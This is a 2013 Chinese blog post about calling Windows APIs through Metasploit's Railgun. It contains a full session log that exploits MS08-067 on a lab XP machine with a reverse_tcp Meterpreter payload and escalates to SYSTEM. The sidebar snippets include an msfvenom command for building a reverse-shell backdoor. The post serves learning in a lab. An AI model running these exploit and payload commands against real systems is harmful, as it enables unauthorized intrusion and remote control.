metasploit通过附加的Railgun组件操作Windows API

最新推荐文章于 2024-05-13 22:43:21 发布
最新推荐文章于 2024-05-13 22:43:21 发布
阅读量2.1k 收藏
点赞数
分类专栏: backtrack metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/8863557
版权 
msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set TARGET 41
TARGET => 41
msf  exploit(ms08_067_netapi) > setg LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms08_067_netapi) > setg LPORT 8080
LPORT => 8080
msf  exploit(ms08_067_netapi) > setg RHOST 192.168.1.142
RHOST => 192.168.1.142
msf  exploit(ms08_067_netapi) > exploit -z

[*] Started reverse handler on 192.168.1.11:8080 
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:8080 -> 192.168.1.142:1081) at 2013-04-28 10:34:29 -0400
[*] Session 1 created in the background.
msf  exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type                   Information  Connection
  --  ----                   -----------  ----------
  1   meterpreter x86/win32               192.168.1.11:8080 -> 192.168.1.142:1081 (192.168.1.142)

msf  exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.railgun.user32.MessageBoxA(0,"hello","world","MB_OK")


在XP上等了很长时间,也没看到弹出来的helloworld的窗口,然后报错,超时了:


Rex::TimeoutError: Operation timed out.
        from /opt/metasploit/msf3/lib/rex/post/meterpreter/packet_dispatcher.rb:191:in `send_request'
        from /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb:261:in `process_function_call'
        from /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb:84:in `call_function'
        from /opt/metasploit/msf3/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_wrapper.rb:24:in `method_missing'
        from (irb):1:in `cmd_irb'
        from /opt/metasploit/msf3/lib/rex/ui/text/irb_shell.rb:49:in `block in run'
        from /opt/metasploit/msf3/lib/rex/ui/text/irb_shell.rb:48:in `catch'
        from /opt/metasploit/msf3/lib/rex/ui/text/irb_shell.rb:48:in `run'
        from /opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:318:in `cmd_irb'
        from /opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
        from /opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:104:in `run_command'
        from /opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
        from /opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
        from /opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
        from /opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:68:in `block in interact'
        from /opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `call'
        from /opt/metasploit/msf3/lib/rex/ui/text/shell.rb:190:in `run'
        from /opt/metasploit/msf3/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'
        from /opt/metasploit/msf3/lib/msf/base/sessions/meterpreter.rb:431:in `_interact'
        from /opt/metasploit/msf3/lib/rex/ui/interactive.rb:49:in `interact'
        from /opt/metasploit/msf3/lib/msf/ui/console/command_dispatcher/core.rb:1595:in `cmd_sessions'
        from /opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:420:in `run_command'
        from /opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:382:in `block in run_single'
        from /opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:376:in `each'
        from /opt/metasploit/msf3/lib/rex/ui/text/dispatcher_shell.rb:376:in `run_single'
        from /opt/metasploit/msf3/lib/rex/ui/text/shell.rb:200:in `run'
        from /opt/metasploit/msf3/msfconsole:143:in `<main>'>>

另外,输入其他的命令: 


meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client

>> client.railgun.shell32.IsUserAnAdmin
=> {"GetLastError"=>0, "return"=>true}
>>

我估计,并非每个Windows API都可以用。


RailgunUsage:

http://dev.metasploit.com/redmine/projects/framework/wiki/RailgunUsage


bt5上就有Railgun的参考手册:

/opt/metasploit/msf3/external/source/meterpreter/source/extensions/stdapi/server/railgun/railgun_manual.pdf

feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Metasploit用户接口(MSF终端、MSF命令行、Armitage)
WEL测试
08-29 5910
2.2Metasploit用户接口          Metasploit软件为它基础功能提供了多个用户接口,包括终端、命令行、图像化界面等。除了这些接口,功能程序(utilities)则提供了对Metasploit框架中内部功能的直接访问。 2.2.1 MSF终端          MSF终端(msfconsole)是目前Metasploit框架最为流行的用户接口,而且MSF终端是Met
Metasploit 学习笔记
不急不躁
07-11 2万+
在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可以配置随系统启动update-rc.d postgresql enable update-rc.d me
metasploit用户接口
seaskying的专栏
10-18 825
Metasploit软件为用户提供了多种接口:包括终端、命令行和图形化界面等。除此之外,功能程序则提供了对Metasploit框架中内部功能的直接访问,这些功能程序对于渗透代码开发,以及在一些不需要整体框架灵活性的场合中非常有价值。 一. MSF终端 命令行中输入 msfconsole 二. MSF命令行 msfcli 三. Armitage Armitage 是一个完
最新2024红队必备工具列表总结_railgun工具(1),2024年最新持续更新大厂面试笔试题
最新发布
2401_84254011的博客
05-13 2022
Web 模糊测试字典与一些Payloads,主要包含:弱口令pj、目录以及文件枚举、Web漏洞一款使用Golang开发且适用于攻防演习内网横向信息收集的高并发网络扫描、服务探测工具。目录扫描工具6、EHole红队重点攻击系统指纹探测工具3.0 重构版-红队重点攻击系统指纹探测工具")1、GobyGoby是一款新的网络安全测试工具,它能够针对一个目标企业梳理最全的攻击面信息,同时能进行高效、实战化漏洞扫描,并快速的从一个验证入口点,切换到横向。
railgun报文层级
easy_mind的博客
11-24 977
这些报文均由定义好的.proto文件通过protoc.exe来自动生成相应的.go文件,特此感谢google爸爸开源了这么好的项目(虽然并不能传到google爸爸的耳朵里),让我这个渣渣能有口饭吃(* ̄3 ̄)╭   报文层级1文件Tcp.proto: 这个proto文件里的报文都是与“单个服务器APP结构”图里的网络层相关的 TCPTransferMsg是用于数据传输的报文。 在发送的数
在利用msf进行提权操作是出现timed out:Error running command shell: Rex::TimeoutError Operation timed out.
xcyja的博客
05-10 2416
在利用msf进行提权操作是出现timed out: 执行shell命令时报错: Error running command shell: Rex::TimeoutError Operation timed out. 错误原因:发现靶机和攻击机不在一个网段中 解决方法: 将靶机的网络连接方式改为NAT模式 电脑中的ip地址方式改为自动获取 即 两个主机之间能相互ping通 ...
metasploitWindows的多种提权方法
02-25
当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来没有的一些权限,这些权限可以用来删除文件,查看私有信息,或者安装特殊程序,比如病毒。...
metasploit Windows版下载
08-13
适用渗透人员
虚拟现实:Windows操作系统的隐形后门
02-06
虚拟现实这是Windows操作系统的后门项目。目标听众这是概念证明的秘密后门,旨在帮助红色团队在安全评估过程中保持对目标的控制。 该项目还打算公开滥用标准功能的方法。产品特点Windows平台极其隐秘的后门。 ICMP-...
kali metasploit 制作后门程序远程操控基本使用方法
qq_51685718的博客
12-03 4039
kali metasploit制作后门程序远程操控基本使用方法 1.后门程序的制作与加密 后门的实质就是木马 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe lhost后面加的是本机ip,lport后面加的是想要打开的端口号 执行后会在本地生成一个biyu.exe的文件 如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。 下
一款集成度高的渗透工具:Railgun
深入交流学习:webMsec
06-13 6716
Railgun为一款GUI界面的渗透工具,将部分人工经验转换为自动化,集成了渗透过程中常用到的一些功能 目前集成了端口扫描、端口爆破、web指纹扫描、漏洞扫描、漏洞利用以及编码转换功能。 信息收集 端口扫描 界面如下 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LjQyOIhY-1623550020985)(https://image.3001.net/images/20210517/1621256630_60a269b634375ad903802.png!small)]
Metasploit 基本使用方法
qq_45541451的博客
11-23 1508
Metasploit 基本使用方法 1.手动启动数据库 systemctl start postgresql systemctl enable postgresql 2.第二种使用终端命令 msfconsole help Core Commands #核心命令 Module Commands #模块命令 Job Commands #后台任务命令 Resource Script Commands #资源脚本命令 Database Backend Commands #数据库后端命令 Credentials Ba
Metasploit用法大全
weixin_30807779的博客
01-24 801
Metasploit用户接口msfconsoleArmitage: KaliGUI启动;armitage命令启动 Metasploit功能程序msfvenom集成了载荷生成器、载荷编码器、空指令生成器的功能查看详细指令选项:msfvenom-h 服务器消息块协议扫描msf>useauxiliary/scanner/smb/smb_version 搜寻配置不当的Microso...
渗透测试——Meterpreter
YT的博客
02-18 2002
Meterpreter 优点: 平台通用性:Meterpreter 提供了基于 JAVA 和 PHP 语言的实现,以应用在各种不同的环境中 纯内存工作模式:执行漏洞渗透攻击的时候,会直接装载 Meterpreter 的动态链接库到目标进程空间中,而不是先将 Meterpreter 上传到磁盘然后再调用 Loadlibrary 加载动态链接库来启动 Meterpreter。这里便会有一个技术...
渗透测试工具&导航合集
weixin_43155143的博客
07-05 2735
渗透测试工具&导航合集
Metasploit渗透测试框架的基本使用
ma963852的博客
11-25 2907
Metasploit简介
kali 输入 msfconsole 启动报错:/usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87
烟敛寒林的博客
11-24 7435
kali   启动 msfconsole 时候失败,报错: root@kali:~# msfconsole /usr/share/metasploit-framework/lib/msf/core/payload/android.rb:87:in `not_after=': bignum too big to convert into `long' (RangeError)         fro...
【工具使用】——Metasploit(MSF)使用详解(超详细)
热门推荐
weixin_45588247的博客
08-12 10万+
文章目录01Metasploit使用一、简介:二、Metasploit的安装和更新升级:1. 一键安装MSF:2. MSF的更新升级:三、使用方法:1. 基础使用:2. `MSF`中加载自定义的`exploit模块`:3. 漏洞利用(exploit):4. 攻击载荷(payload):4.1 payload模块路径::4.2 Metasploit中的 Payload 模块主要有以下三种类型:5. Meterpreter:5.1 Meterpreter是如何工作的?:5.2 Meterpreter的特点:6.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值